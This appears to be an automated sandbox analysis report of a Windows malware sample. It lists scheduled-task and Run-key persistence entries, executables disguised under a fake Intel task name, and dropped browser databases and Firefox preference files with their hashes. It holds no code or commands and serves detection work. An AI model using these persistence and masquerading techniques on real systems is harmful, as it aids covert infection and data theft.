                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                              • Skipping network analysis since amount of network traffic is too extensive
Time     | Type            | Description
02:13:05 | Task Scheduler  | Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
02:14:31 | Task Scheduler  | Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
02:15:02 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 77594b3442.exe C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
02:15:12 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 77594b3442.exe C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
02:15:21 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exe C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
02:15:30 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9d4ddc637a.exe C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe
02:15:39 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ce29828af5.exe C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe
02:15:52 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exe C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
02:16:01 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9d4ddc637a.exe C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe
02:16:11 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ce29828af5.exe C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe
02:17:13 | Task Scheduler  | Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
02:20:18 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2e4e95ff2a.exe C:\Users\user\AppData\Local\Temp\1019045001\2e4e95ff2a.exe
02:20:27 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d850ccdb8a.exe C:\Users\user\AppData\Local\Temp\1019046001\d850ccdb8a.exe
02:20:35 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c2cce73e6e.exe C:\Users\user\AppData\Local\Temp\1019047001\c2cce73e6e.exe
02:20:43 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bb72915ca9.exe C:\Users\user\AppData\Local\Temp\1019048001\bb72915ca9.exe
02:20:51 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2e4e95ff2a.exe C:\Users\user\AppData\Local\Temp\1019045001\2e4e95ff2a.exe
02:21:00 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d850ccdb8a.exe C:\Users\user\AppData\Local\Temp\1019046001\d850ccdb8a.exe
02:21:08 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c2cce73e6e.exe C:\Users\user\AppData\Local\Temp\1019047001\c2cce73e6e.exe
02:21:16 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bb72915ca9.exe C:\Users\user\AppData\Local\Temp\1019048001\bb72915ca9.exe
21:14:03 | API Interceptor | 17110346x Sleep call for process: skotes.exe modified
21:14:30 | API Interceptor | 43x Sleep call for process: powershell.exe modified
21:14:37 | API Interceptor | 60x Sleep call for process: 4268204ace.exe modified
21:14:45 | API Interceptor | 3x Sleep call for process: svchost.exe modified
21:14:59 | API Interceptor | 78x Sleep call for process: 77594b3442.exe modified
21:15:13 | API Interceptor | 504049x Sleep call for process: 9c2981f3e5.exe modified
21:15:20 | API Interceptor | 30221x Sleep call for process: 0577f55121.exe modified
21:15:41 | API Interceptor | 104x Sleep call for process: 513dad5c05.exe modified
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5242880
                                                                                                                                                                                                                              Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                              MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                              SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                              SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                              SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11848
                                                                                                                                                                                                                              Entropy (8bit):5.484261456046099
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:vnaRtLYbBp6ihj4qyaaX86KaNhe5RfGNBw8dYSl:aeAqu74cwL0
                                                                                                                                                                                                                              MD5:BBEB86C24FD7C0EFC3E670479AFE9A78
                                                                                                                                                                                                                              SHA1:AC210D1932735D1515D31162A1BD034C0CCC1C2B
                                                                                                                                                                                                                              SHA-256:9DEF6586D9D4BF7557D1BCDB4830641AF8ACEBB7301575ECEE0EEE8B4AB67FDA
                                                                                                                                                                                                                              SHA-512:60CA5A7FED1015263B4FD33485D82F160B424D4FB068BFD9D99913FACED16D61C1463F23311562B020CEB2B72A2CC9349AE9EC0F9B56CBA1A91FA3DF9836738F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1734747327);..user_pref("app.up
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xab69afc7, page size 16384, Windows version 10.0
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                              Entropy (8bit):0.42216175025113467
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:HSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Hazag03A2UrzJDO
                                                                                                                                                                                                                              MD5:2FFA786B649D46A495E4E034A6604D76
                                                                                                                                                                                                                              SHA1:B548B974ABFFEC8AD72EE2510D58D4DC85A03DD3
                                                                                                                                                                                                                              SHA-256:63F9F28CB8EB913DDF0BF009414B5E3FA500CECD88EA9D6382746A6E2AD9A903
                                                                                                                                                                                                                              SHA-512:A323991F1EA13B6D17CEFB9474D658E01C91CB055F1FF9BA91EF990ED15EC887B2FC0E05D59DC34DB6398F9122AC91B3D0665B97D26186411C8F98E353D12F3A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11644
                                                                                                                                                                                                                              Entropy (8bit):5.480461933159794
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:jnaRtLYbBp6ihj4qyaaX86KaNhe5RfGNBw8dJSl:GeAqu74cwm0
                                                                                                                                                                                                                              MD5:4EC300E00A4F8A4AE9B53EE29A1069F8
                                                                                                                                                                                                                              SHA1:CC40AF90133FFCBCFB801C64EA5ADBA759EB7CDF
                                                                                                                                                                                                                              SHA-256:BF9ED5F15E42263C4782B2EE1043FE64D1EC8FD8A31724B1EFE11FD7BCCC9528
                                                                                                                                                                                                                              SHA-512:F1D21131AAA330831D0AA2AF9176E0BA417D783B9E4D068278D9ECD717D8086E90DB64A0B30674B701DFDCC9B2D2071C4C4073D109958D09A27D77286999C43F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1734747327);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):294912
                                                                                                                                                                                                                              Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                              MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                              SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                              SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                              SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
